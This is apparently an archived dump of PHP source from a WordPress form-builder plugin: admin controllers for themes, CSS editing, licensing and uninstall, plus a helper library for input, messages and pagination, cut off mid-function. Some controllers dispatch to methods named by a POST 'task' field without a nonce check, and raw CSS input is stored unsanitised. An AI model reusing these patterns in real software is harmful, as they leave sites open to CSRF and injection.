  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerFormcontactwdcaptcha.php000060400000005122152434416630017344 0ustar00<?php

class FMControllerFormcontactwdcaptcha {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelFormcontactwdcaptcha.php";
    $model = new FMModelFormcontactwdcaptcha();

    require_once WD_FMC_DIR . "/admin/views/FMViewFormcontactwdcaptcha.php";
    $view = new FMViewFormcontactwdcaptcha($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerLicensing_fmc.php000060400000005335152434416630015754 0ustar00<?php

class FMControllerLicensing_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $task = ((isset($_POST['task'])) ? esc_html(stripslashes($_POST['task'])) : '');
    if (method_exists($this, $task)) {
      $this->$task($id);
    }
    else {
      $this->display();
    }
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelLicensing_fmc.php";
    $model = new FMModelLicensing_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewLicensing_fmc.php";
    $view = new FMViewLicensing_fmc($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerThemes_fmc.php000060400000017205152434416630015265 0ustar00<?php

class FMControllerThemes_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $task = WDW_FMC_Library::get('task');
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $message = WDW_FMC_Library::get('message');
    echo WDW_FMC_Library::message_id($message);
    if (method_exists($this, $task)) {
      check_admin_referer('nonce_fmc', 'nonce_fmc');
      $this->$task($id);
    }
    else {
      $this->display();
    }
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelThemes_fmc.php";
    $model = new FMModelThemes_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewThemes_fmc.php";
    $view = new FMViewThemes_fmc($model);
    $view->display();
  }

  public function add() {
    require_once WD_FMC_DIR . "/admin/models/FMModelThemes_fmc.php";
    $model = new FMModelThemes_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewThemes_fmc.php";
    $view = new FMViewThemes_fmc($model);
    $view->edit(0, FALSE);
  }

  public function edit() {
    require_once WD_FMC_DIR . "/admin/models/FMModelThemes_fmc.php";
    $model = new FMModelThemes_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewThemes_fmc.php";
    $view = new FMViewThemes_fmc($model);
    // $id = ((isset($_POST['current_id']) && esc_html($_POST['current_id']) != '') ? esc_html($_POST['current_id']) : 0);
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $view->edit($id, FALSE);
  }

  public function save() {
    $message = $this->save_db();
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  public function apply() {
    $message = $this->save_db();
    global $wpdb;
    // if (!isset($_POST['current_id']) || (esc_html($_POST['current_id']) == 0) || (esc_html($_POST['current_id']) == '')) {
      
    // }
    $id = (int) $wpdb->get_var('SELECT MAX(`id`) FROM ' . $wpdb->prefix . 'formmaker_themes');
    $current_id = (int)WDW_FMC_Library::get('current_id', $id);
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'edit', 'current_id' => $current_id, 'message' => $message), admin_url('admin.php')));
    // $this->edit();
  }
  
  public function save_db() {
    global $wpdb;
    // $id = (isset($_POST['current_id']) ? (int) esc_html(stripslashes( $_POST['current_id'])) : 0);
    $id = (int) WDW_FMC_Library::get('current_id', 0);
    $title = (isset($_POST['title']) ? esc_html(stripslashes( $_POST['title'])) : '');
    $css = (isset($_POST['css']) ? stripslashes(preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $_POST['css'])) : '');
    $default = (isset($_POST['default']) ? esc_html(stripslashes( $_POST['default'])) : 0);
    if ($id != 0) {
      $save = $wpdb->update($wpdb->prefix . 'formmaker_themes', array(
        'title' => $title,
        'css' => $css,
        'default' => $default,
      ), array('id' => $id));
    }
    else {
      $save = $wpdb->insert($wpdb->prefix . 'formmaker_themes', array(
        'title' => $title,                       
        'css' => $css,         
        'default' => $default,
      ), array(
        '%s',
        '%s',
        '%d',
      ));
    }
    if ($save !== FALSE) {
      return 1;
    }
    else {
      return 2;
    }
  }

  public function delete($id) {
    global $wpdb;
    $isDefault = $wpdb->get_var($wpdb->prepare('SELECT `default` FROM ' . $wpdb->prefix . 'formmaker_themes WHERE id="%d"', $id));
    if ($isDefault) {
      $message = 4;
    }
    else {
      $query = $wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_themes WHERE id="%d"', $id);
      if ($wpdb->query($query)) {
        $message = 3;
      }
      else {
        $message = 2;
      }
    }
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }
  
  public function delete_all() {
    global $wpdb;
    $flag = FALSE;
    $isDefault = FALSE;
    $theme_ids_col = $wpdb->get_col('SELECT id FROM ' . $wpdb->prefix . 'formmaker_themes');
    foreach ($theme_ids_col as $theme_id) {
      if (isset($_POST['check_' . $theme_id])) {
        $isDefault = $wpdb->get_var($wpdb->prepare('SELECT `default` FROM ' . $wpdb->prefix . 'formmaker_themes WHERE id="%d"', $theme_id));
        if ($isDefault) {
          $message = 4;
        }
        else {
          $flag = TRUE;
          $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_themes WHERE id="%d"', $theme_id));
        }
      }
    }
    if ($flag) {
      $message = 5;
    }
    else {
      $message = 6;
    }
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  public function setdefault($id) {
    global $wpdb;
    $wpdb->update($wpdb->prefix . 'formmaker_themes', array('default' => 0), array('default' => 1));
    $save = $wpdb->update($wpdb->prefix . 'formmaker_themes', array('default' => 1), array('id' => $id));
    if ($save !== FALSE) {
      $message = 7;
    }
    else {
      $message = 2;
    }
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerFormMakerEditCSS_fmc.php000060400000010654152434416630017103 0ustar00<?php

class FMControllerFormMakerEditCSS_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $task = ((isset($_POST['task'])) ? esc_html($_POST['task']) : '');
    $id = ((isset($_POST['current_id'])) ? (int)esc_html($_POST['current_id']) : 0);
    if (method_exists($this, $task)) {
      $this->$task($id);
    }
    else {
      $this->display();
    }
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelFormMakerEditCSS_fmc.php";
    $model = new FMModelFormMakerEditCSS_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewFormMakerEditCSS_fmc.php";
    $view = new FMViewFormMakerEditCSS_fmc($model);
    $view->display();
  }

  public function save() {
    $this->update_db();
  }

  public function apply() {
    $this->update_db();
    $this->display();
  }

  public function save_as_new() {
    $this->insert_db();
  }

  public function insert_db() {
    global $wpdb;
    $title = (isset($_POST['title']) ? esc_html(stripslashes( $_POST['title'])) : '');
    $css = (isset($_POST['css']) ? stripslashes(preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $_POST['css'])) : '');
    $default = (isset($_POST['default']) ? esc_html(stripslashes( $_POST['default'])) : 0);
    $save = $wpdb->insert($wpdb->prefix . 'formmaker_themes', array(
      'title' => $title,                       
      'css' => $css,         
      'default' => $default,
    ), array(
      '%s',
      '%s',
      '%d',
    ));
  }

  public function update_db() {
    global $wpdb;
    $id = (isset($_POST['current_id']) ? (int) esc_html(stripslashes( $_POST['current_id'])) : 0);
    $title = (isset($_POST['title']) ? esc_html(stripslashes( $_POST['title'])) : '');
    $css = (isset($_POST['css']) ? stripslashes(preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $_POST['css'])) : '');
    $default = (isset($_POST['default']) ? esc_html(stripslashes( $_POST['default'])) : 0);
    $save = $wpdb->update($wpdb->prefix . 'formmaker_themes', array(
      'title' => $title,
      'css' => $css,
      'default' => $default,
    ), array('id' => $id));
    if ($save !== FALSE) {
      echo WDW_FMC_Library::message('Item Succesfully Saved.', 'updated');
    }
    else {
      echo WDW_FMC_Library::message('Error. Please install plugin again.', 'error');
    }
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerFormcontactwindow.php000060400000005103152434416630016714 0ustar00<?php

class FMControllerFormcontactwindow {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelFormcontactwindow.php";
    $model = new FMModelFormcontactwindow();

    require_once WD_FMC_DIR . "/admin/views/FMViewFormcontactwindow.php";
    $view = new FMViewFormcontactwindow($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerGenerete_xml_fmc.php000060400000005076152434416630016461 0ustar00<?php

class FMControllerGenerete_xml_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelGenerete_xml_fmc.php";
    $model = new FMModelGenerete_xml_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewGenerete_xml_fmc.php";
    $view = new FMViewGenerete_xml_fmc($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerGenerete_csv_fmc.php000060400000005076152434416630016454 0ustar00<?php

class FMControllerGenerete_csv_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelGenerete_csv_fmc.php";
    $model = new FMModelGenerete_csv_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewGenerete_csv_fmc.php";
    $view = new FMViewGenerete_csv_fmc($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerFromipinfoinpopup_fmc.php000060400000005127152434416630017563 0ustar00<?php

class FMControllerFromipinfoinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelFromipinfoinpopup_fmc.php";
    $model = new FMModelFromipinfoinpopup_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewFromipinfoinpopup_fmc.php";
    $view = new FMViewFromipinfoinpopup_fmc($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerUninstall_fmc.php000060400000006060152434416630016006 0ustar00<?php

class FMControllerUninstall_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $task = ((isset($_POST['task'])) ? esc_html(stripslashes($_POST['task'])) : '');
    if (method_exists($this, $task)) {
      check_admin_referer('nonce_fmc', 'nonce_fmc');
      $this->$task();
    }
    else {
      $this->display();
    }
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelUninstall_fmc.php";
    $model = new FMModelUninstall_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewUninstall_fmc.php";
    $view = new FMViewUninstall_fmc($model);
    $view->display();
  }

  public function uninstall() {
    require_once WD_FMC_DIR . "/admin/models/FMModelUninstall_fmc.php";
    $model = new FMModelUninstall_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewUninstall_fmc.php";
    $view = new FMViewUninstall_fmc($model);
    $view->uninstall();
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}framework/WDW_FMC_Library.php000060400000037623152434416630012103 0ustar00<?php

class WDW_FMC_Library {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }


  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  public static function get($key, $default_value = '') {
    if (isset($_GET[$key])) {
      $value = $_GET[$key];
    }
    elseif (isset($_POST[$key])) {
      $value = $_POST[$key];
    }
    else {
      $value = '';
    }
    if (!$value) {
      $value = $default_value;
    }
    return esc_html($value);
  }

  public static function message_id($message_id) {
    if ($message_id) {
      switch($message_id) {
        case 1: {
          $message = 'Item Succesfully Saved.';
          $type = 'updated';
          break;

        }
        case 2: {
          $message = 'Error. Please install plugin again.';
          $type = 'error';
          break;

        }
        case 3: {
          $message = 'Item Succesfully Deleted.';
          $type = 'updated';
          break;

        }
        case 4: {
          $message = "You can't delete default theme";
          $type = 'error';
          break;

        }
        case 5: {
          $message = 'Items Succesfully Deleted.';
          $type = 'updated';
          break;

        }
        case 6: {
          $message = 'You must select at least one item.';
          $type = 'error';
          break;

        }
        case 7: {
          $message = 'The item is successfully set as default.';
          $type = 'updated';
          break;

        }
        case 8: {
          $message = 'Options Succesfully Saved.';
          $type = 'updated';
          break;

        }
      }
      return '<div style="width:99%"><div class="' . $type . '"><p><strong>' . $message . '</strong></p></div></div>';
    }
  }

  public static function message($message, $type, $form_id = 0) {
    return '<div style="width: 100%;"  class="form' . $form_id . '"><div class="' . $type . '"><p><strong>' . $message . '</strong></p></div></div>';
  }

  public static function search($search_by, $search_value, $form_id) {
    ?>
    <div class="alignleft actions" style="clear:both;">
		<script>
			function fm_search() {
				document.getElementById("page_number").value = "1";
				document.getElementById("search_or_not").value = "search";
				document.getElementById("<?php echo $form_id; ?>").submit();
			}
			function fm_reset() {
				if (document.getElementById("search_value")) {
					document.getElementById("search_value").value = "";
				}
				if (document.getElementById("search_select_value")) {
					document.getElementById("search_select_value").value = 0;
				}
				document.getElementById("<?php echo $form_id; ?>").submit();
			}
		</script>
		<div class="fm-search">
			<label for="search_value"><?php echo $search_by; ?>:</label>
			<input type="text" id="search_value" name="search_value" value="<?php echo esc_html($search_value); ?>"/>
			<button class="fm-icon search-icon" onclick="fm_search()">
			</button>
			<button class="fm-icon reset-icon" onclick="fm_reset()">
			</button>
		</div>
	</div>
    <?php
  }

  public static function search_select($search_by, $search_select_value, $playlists, $form_id) {
    ?>
    <div class="alignleft actions" style="clear:both;">
      <script>
        function fm_search_select() {
          document.getElementById("page_number").value = "1";
          document.getElementById("search_or_not").value = "search";
          document.getElementById("<?php echo $form_id; ?>").submit();
        }
      </script>
      <div class="alignleft actions" >
        <label for="search_select_value" style="font-size:14px; width:50px; display:inline-block;"><?php echo $search_by; ?>:</label>
        <select id="search_select_value" name="search_select_value" onchange="fm_search_select();" style="float: none; width: 150px;">
        <?php
          foreach ($playlists as $id => $playlist) {
            ?>
            <option value="<?php echo $id; ?>" <?php echo (($search_select_value == $id) ? 'selected="selected"' : ''); ?>><?php echo $playlist; ?></option>
            <?php
          }
        ?>
        </select>
      </div>
    </div>
    <?php
  }
  
  public static function html_page_nav($count_items, $page_number, $form_id, $items_per_page = 20) {
    $limit = 20;
    if ($count_items) {
      if ($count_items % $limit) {
        $items_county = ($count_items - $count_items % $limit) / $limit + 1;
      }
      else {
        $items_county = ($count_items - $count_items % $limit) / $limit;
      }
    }
    else {
      $items_county = 1;
    }
    ?>
    <script type="text/javascript">
      var items_county = <?php echo $items_county; ?>;
      function fm_page(x, y) {       
        switch (y) {
          case 1:
            if (x >= items_county) {
              document.getElementById('page_number').value = items_county;
            }
            else {
              document.getElementById('page_number').value = x + 1;
            }
            break;
          case 2:
            document.getElementById('page_number').value = items_county;
            break;
          case -1:
            if (x == 1) {
              document.getElementById('page_number').value = 1;
            }
            else {
              document.getElementById('page_number').value = x - 1;
            }
            break;
          case -2:
            document.getElementById('page_number').value = 1;
            break;
          default:
            document.getElementById('page_number').value = 1;
        }
		jQuery('#pagination_clicked').val('1');
        document.getElementById('<?php echo $form_id; ?>').submit();
      }
      function check_enter_key(e) {
        var key_code = (e.keyCode ? e.keyCode : e.which);
        if (key_code == 13) { /*Enter keycode*/
          if (jQuery('#current_page').val() >= items_county) {
           document.getElementById('page_number').value = items_county;
          }
          else {
           document.getElementById('page_number').value = jQuery('#current_page').val();
          }
		  jQuery('#pagination_clicked').val('1');
          document.getElementById('<?php echo $form_id; ?>').submit();
        }
        return true;
      }
    </script>
    <div class="tablenav-pages">
      <span class="displaying-num">
        <?php
        if ($count_items != 0) {
          echo $count_items; ?> item<?php echo (($count_items == 1) ? '' : 's');
        }
        ?>
      </span>
      <?php
      if ($count_items > $items_per_page) {
        $first_page = "first-page";
        $prev_page = "prev-page";
        $next_page = "next-page";
        $last_page = "last-page";
        if ($page_number == 1) {
          $first_page = "first-page disabled";
          $prev_page = "prev-page disabled";
          $next_page = "next-page";
          $last_page = "last-page";
        }
        if ($page_number >= $items_county) {
          $first_page = "first-page ";
          $prev_page = "prev-page";
          $next_page = "next-page disabled";
          $last_page = "last-page disabled";
        }
      ?>
      <span class="pagination-links">
        <a class="<?php echo $first_page; ?>" title="Go to the first page" href="javascript:fm_page(<?php echo $page_number; ?>,-2);">«</a>
        <a class="<?php echo $prev_page; ?>" title="Go to the previous page" href="javascript:fm_page(<?php echo $page_number; ?>,-1);">‹</a>
        <span class="paging-input">
          <span class="total-pages">
          <input class="current_page" id="current_page" name="current_page" value="<?php echo $page_number; ?>" onkeypress="return check_enter_key(event)" title="Go to the page" type="text" size="1" />
        </span> of 
        <span class="total-pages">
            <?php echo $items_county; ?>
          </span>
        </span>
        <a class="<?php echo $next_page ?>" title="Go to the next page" href="javascript:fm_page(<?php echo $page_number; ?>,1);">›</a>
        <a class="<?php echo $last_page ?>" title="Go to the last page" href="javascript:fm_page(<?php echo $page_number; ?>,2);">»</a>
        <?php
      }
      ?>
      </span>
    </div>
    <input type="hidden" id="page_number" name="page_number" value="<?php echo ((isset($_POST['page_number'])) ? (int) $_POST['page_number'] : 1); ?>" />
    <input type="hidden" id="search_or_not" name="search_or_not" value="<?php echo ((isset($_POST['search_or_not'])) ? esc_html($_POST['search_or_not']) : ''); ?>"/>
    <?php
  }

  public static function ajax_search($search_by, $search_value, $form_id) {
    ?>
    <div class="alignleft actions" style="clear:both;">
      <script>
        function fm_search() {
          document.getElementById("page_number").value = "1";
          document.getElementById("search_or_not").value = "search";
          fm_ajax_save('<?php echo $form_id; ?>');
        }
        function fm_reset() {
          if (document.getElementById("search_value")) {
            document.getElementById("search_value").value = "";
          }
          fm_ajax_save('<?php echo $form_id; ?>');
        }
      </script>
      <div class="alignleft actions" style="">
        <label for="search_value" style="font-size:14px; width:60px; display:inline-block;"><?php echo $search_by; ?>:</label>
        <input type="text" id="search_value" name="search_value" class="fm_search_value" value="<?php echo esc_html($search_value); ?>" style="width: 150px;<?php echo (get_bloginfo('version') > '3.7') ? ' height: 28px;' : ''; ?>" />
      </div>
      <div class="alignleft actions">
        <input type="button" value="Search" onclick="fm_search()" class="button-secondary action">
        <input type="button" value="Reset" onclick="fm_reset()" class="button-secondary action">
      </div>
    </div>
    <?php
  }

  public static function ajax_html_page_nav($count_items, $page_number, $form_id) {
    $limit = 20;
    if ($count_items) {
      if ($count_items % $limit) {
        $items_county = ($count_items - $count_items % $limit) / $limit + 1;
      }
      else {
        $items_county = ($count_items - $count_items % $limit) / $limit;
      }
    }
    else {
      $items_county = 1;
    }
    ?>
    <script type="text/javascript">
      var items_county = <?php echo $items_county; ?>;
      function fm_page(x, y) {
        switch (y) {
          case 1:
            if (x >= items_county) {
              document.getElementById('page_number').value = items_county;
            }
            else {
              document.getElementById('page_number').value = x + 1;
            }
            break;
          case 2:
            document.getElementById('page_number').value = items_county;
            break;
          case -1:
            if (x == 1) {
              document.getElementById('page_number').value = 1;
            }
            else {
              document.getElementById('page_number').value = x - 1;
            }
            break;
          case -2:
            document.getElementById('page_number').value = 1;
            break;
          default:
            document.getElementById('page_number').value = 1;
        }
        fm_ajax_save('<?php echo $form_id; ?>');
      }
      function check_enter_key(e) { 	  
        var key_code = (e.keyCode ? e.keyCode : e.which);
        if (key_code == 13) { /*Enter keycode*/
          if (jQuery('#current_page').val() >= items_county) {
           document.getElementById('page_number').value = items_county;
          }
          else {
           document.getElementById('page_number').value = jQuery('#current_page').val();
          }
          fm_ajax_save('<?php echo $form_id; ?>');
          return false;
        }
       return true;		 
      }
    </script>
    <div id="tablenav-pages" class="tablenav-pages">
      <span class="displaying-num">
        <?php
